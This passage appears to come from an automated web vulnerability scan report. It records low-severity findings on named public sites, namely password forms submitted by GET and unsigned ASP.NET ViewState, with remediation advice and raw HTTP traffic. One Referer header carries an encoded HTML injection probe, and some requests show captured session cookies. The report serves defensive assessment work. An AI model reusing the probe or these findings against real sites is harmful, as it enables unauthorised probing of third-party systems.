Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

13. Password field submitted using GET method previous next
There are 3 instances of this issue:

http://digg.com/search
http://www.scientificamerican.com/blog/observations/
http://www.scientificamerican.com/errors/404.cfm

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

13.1. http://digg.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/search

The form contains the following password field:

password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser

The form contains the following password field:

password

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.3. http://www.scientificamerican.com/errors/404.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/errors/404.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser

The form contains the following password field:

password

Request

GET /errors/404.cfm HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
</h3>
       <form id="login" action="https://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

14. ASP.NET ViewState without MAC enabled previous next
There are 24 instances of this issue:

http://beta-ads.ace.advertising.com/
http://college.scout.com/
http://content.scout.com/a.z
http://jcfootball.scout.com/
http://mlb.scout.com/
http://p.ace.advertising.com/
http://preps.scout.com/
http://r1-ads.ace.advertising.com/
http://r1.ace.advertising.com/
http://recruiting.scout.com/a.z
http://rss.scout.com/rss.aspx
https://secure.scout.com/a.z
http://www.scout.com/
http://www.scout.com/3/college-links.html
http://www.scout.com/3/company.html
http://www.scout.com/3/fair-use.html
http://www.scout.com/3/jobs.html
http://www.scout.com/3/privacy-policy.html
http://www.scout.com/3/recruiting-links.html
http://www.scout.com/3/security-information.html
http://www.scout.com/3/terms-of-service.html
http://www.scout.com/a.z
http://www.scout.com/search.aspx
http://www.scout.com/widgets/

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

14.1. http://beta-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://beta-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: beta-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 02:06:03 GMT
Content-Length: 1402
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.2. http://college.scout.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://college.scout.com
Path:	/

Request

GET / HTTP/1.1
Host: college.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 69563

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>College Team Directory Front Page</title>
<meta http
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.3. http://content.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://content.scout.com
Path:	/a.z

Request

GET /a.z HTTP/1.1
Host: content.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:57 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.4. http://jcfootball.scout.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://jcfootball.scout.com
Path:	/

Request

GET / HTTP/1.1
Host: jcfootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:07 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:07 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT
ETag: "1CBC00F93FC0280"
Content-Type: text/html
Content-Length: 41053

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>JC Football Recruiting Front Page</title>
<meta http
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.5. http://mlb.scout.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mlb.scout.com
Path:	/

Request

GET / HTTP/1.1
Host: mlb.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:36 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:57 GMT
ETag: "1CBC01059DF3080"
Content-Type: text/html
Content-Length: 27801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>MLB Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.6. http://p.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://p.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: p.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.7. http://preps.scout.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://preps.scout.com
Path:	/

Request

GET / HTTP/1.1
Host: preps.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:49 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 29848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>High School Sports Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.8. http://r1-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1398
Date: Sun, 30 Jan 2011 02:18:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.9. http://r1.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.10. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Request

GET /a.z HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 29 Jan 2011 23:50:44 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:44 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.11. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.12. https://secure.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Request

GET /a.z HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:50:53 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:00:53 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.13. http://www.scout.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/

Request

GET / HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:25:49 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:35:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT
ETag: "1CBC00FE3423300"
Content-Type: text/html
Content-Length: 99726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.14. http://www.scout.com/3/college-links.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/college-links.html

Request

GET /3/college-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.15. http://www.scout.com/3/company.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/company.html

Request

GET /3/company.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14472

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.16. http://www.scout.com/3/fair-use.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/fair-use.html

Request

GET /3/fair-use.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13618

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.17. http://www.scout.com/3/jobs.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/jobs.html

Request

GET /3/jobs.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
